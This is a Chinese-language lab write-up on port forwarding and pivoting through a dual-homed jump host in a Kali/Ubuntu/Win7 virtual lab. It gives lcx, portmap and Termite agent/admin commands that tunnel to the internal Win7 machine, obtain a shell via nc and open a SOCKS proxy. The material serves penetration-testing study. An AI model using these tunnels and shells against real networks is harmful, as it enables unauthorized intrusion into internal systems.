端口转发与代理学习

环境搭建

三台虚拟机ubuntu，kali和win7，其中kali为桥接，ubuntu是双网卡，一个桥接一个仅主机，win7为仅主机

kali：192.168.2.191

Ubuntu：192.168.2.120&&192.168.15.128

win7：192.168.15.130

此时kali和ubuntu可以通信，ubuntu和win7可以通信

目的：模拟kali作为攻击机，ubuntu作为跳板机实现kali和win7通信

利用lcx|portmap实现端口转发

windows：lcx.exe || linux:portmap

在win7上执行

lcx.exe -slave 192.168.15.128 4444 127.0.0.1 80 #若内网机器为linux则./portmap -m 3 -h1 127.0.0.1 -p1 80 -h2 192.168.15.128 -p2 4444

 将80端口的流量转发到192.168.15.128的4444端口

在ubuntu上执行

./portmap  -m 2 -p1 4444 -h2 192.168.2.120 -p2 5555 #若跳板机为windows则执行lcx.exe -listen 4444 5555

 监听4444端口然后再把它转发到192.168.2.120（这里是本机）的5555

攻击机kali上此时可以通过访问192.168.2.120的5555端口来实现和win7的80端口通信

利用Termite穿透内网

在Ubuntu中执行

./agent_linux_x86_64  -l 8887

在kali中执行

./admin_linux_x86_64 -c 192.168.2.120 -p 8887

在win7中执行

./agent_windows_x86.exe -c 192.168.15.128 -l 8887

此时如图

在运行了admin端的kali机器上获得一个控制台，内置了一些命令，可以实现shell连接、socks代理、端口转发和文件上传下载等功能。

shell连接：nc连接本地的指定端口即可拿到目标机器shell

 

端口转发：将目标机器win7的80端口以节点1为跳板转发到本地的8081端口

socks代理：在1节点下socks 1080，此时会在本地1080端口以1节点开一个socks代理，挂代理可以直接访问内网的win7

 

（可以搭配proxychians|proxifier使用）